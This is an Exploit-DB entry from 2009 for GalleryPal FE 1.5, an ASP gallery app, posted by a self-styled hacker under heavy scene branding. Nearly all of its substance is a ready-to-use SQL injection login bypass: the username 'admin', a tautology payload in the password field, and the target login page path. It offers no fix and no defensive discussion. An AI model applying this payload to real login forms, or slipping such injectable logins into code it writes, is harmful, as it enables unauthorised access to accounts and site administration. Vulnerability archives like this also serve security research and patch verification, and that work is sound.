GalleryPal FE 1.5 - Authentication Bypass

EDB-ID:

10464


Platform:

ASP

Published:

2009-12-15

------------------------------------------------------------
[~] GalleryPal FE v1.5(Auth Bypass)

[~]TYPE:Remote SQL Injection Vulnerability

[~] ----------------------------------------------------------

[~] author: R3d-D3v!L

[~]

[~] Date: 15.11.2008

[~]

[~] Home: www.ahacker.net

[~]

[~] contact: N/A

[~]

[~] -----------------------------------------------------------


ALERT FR0M THE DARKNESS BY 7h3 REd-D3v!L

[~] Exploit:



[*] username : admin


[*] password : X' or ' 1=1--

[*] demo:

[*] server/GalleryPal_FE_Demo/login.asp



[~] spechial thanks : ((dolly)) & ((7am3m)) & ((magoush_1987)) & (DEV!L_MODE) & ((0R45hy)) & {0}-{n-c-A}-{0}

[~]

[?] 4.!.S ---> ((R3d D?v!L))--JuPA--M2Z --d3v!L-Ro07

[~]

[~] www.xp10.me

[~]

[~]I4M:4r48!4N-3XPLO!73r